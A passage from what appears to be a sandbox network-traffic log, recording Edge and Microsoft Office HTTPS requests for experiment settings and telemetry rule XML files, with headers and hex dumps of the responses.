                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 0c3517a5-201e-0003-7a8c-3af85a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095435Z-1777c6cb754b7tdghC1TEBwwa400000009kg000000006eqb
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      135192.168.2.64987394.245.104.564433660C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                      Set-Cookie: ARRAffinity=3e4931a31fa9f6b0a9a0b3e0bec1ba0e7d81601066244883a4782a099ce2b765;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                      Set-Cookie: ARRAffinitySameSite=3e4931a31fa9f6b0a9a0b3e0bec1ba0e7d81601066244883a4782a099ce2b765;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                      Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      136192.168.2.64988113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bfe6eb71-201e-006e-168c-3abbe3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095435Z-1777c6cb7549x5qchC1TEBggbg00000009e000000000cnh6
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      137192.168.2.64988313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1378
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 4ac405f8-001e-002b-168c-3a99f2000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95csd4bwhC1NYCq7dc00000009x000000000e7nk
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      138192.168.2.64988213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1415
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a16a2ddb-901e-0064-058c-3ae8a6000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95csd4bwhC1NYCq7dc00000009vg00000000hkmr
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      139192.168.2.64988413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1407
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-1777c6cb7544n7p6hC1TEByvb400000009gg00000000c70g
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      140192.168.2.64988513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1370
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 873207a6-301e-001f-2d8c-3aaa3a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95crwqd8hC1NYCps680000000a4g000000001x66
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      141192.168.2.64989913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a615b14a-d01e-008e-6e8c-3a387a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-185f5d8b95cf7qddhC1NYC66an0000000a2g00000000byh8
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      142192.168.2.64990313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1414
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f390f01b-d01e-0017-588c-3ab035000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095436Z-r1d97b995778dpcthC1TEB4b5400000008qg000000000625
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      143192.168.2.64990113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1406
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
